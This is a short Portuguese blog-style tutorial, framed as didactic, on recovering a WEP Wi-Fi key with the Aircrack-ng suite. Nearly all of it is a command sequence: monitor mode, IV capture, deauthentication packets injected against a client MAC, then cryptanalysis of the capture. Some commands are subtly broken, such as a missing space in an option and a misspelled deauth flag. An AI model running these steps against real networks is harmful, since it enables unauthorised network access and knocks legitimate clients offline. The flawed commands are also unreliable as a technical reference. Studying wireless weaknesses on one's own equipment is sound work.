Embora seja realmente antigo e teoricamente não devam existir em produção redes Wi-Fi utilizando WEP com chave compartilhada para acesso, este é um pequeno roteiro que demonstra como utilizar programas da suite Aircrack para executar análise de frequência com o intuito de se descobrir a ‘senha do Wi-Fi’.
Não é meu objetivo demonstrar como instalar o Aircrack-NG na sua distribuição Linux favorita, como usar ele junto do Kali Linux ou dar detalhes sobre o que faz cada programa e parâmetros utilizados. Nossa intenção é única e exclusivamente registrar um pequeno ‘roteiro para fins didáticos‘:
#Verificações
ifconfig wlan0 iwconfig wlan0 iwlist wlan0 scan iw wlan0 info (ou "iw wlan0mon info")
#Alterar placa de rede para modo monitor
airmon-ng start wlan0
#Capturar pacotes (IVs)
airodump-ng -c 11-w arquivo wlan0mon
#Injetar pacotes especiais para Desautenticar
aireplay-ng --deaut 100 -h MAC_CLIENTE -e ESSID wlan0mon
#Executar criptoanálise
aircrack-ng arquivo.cap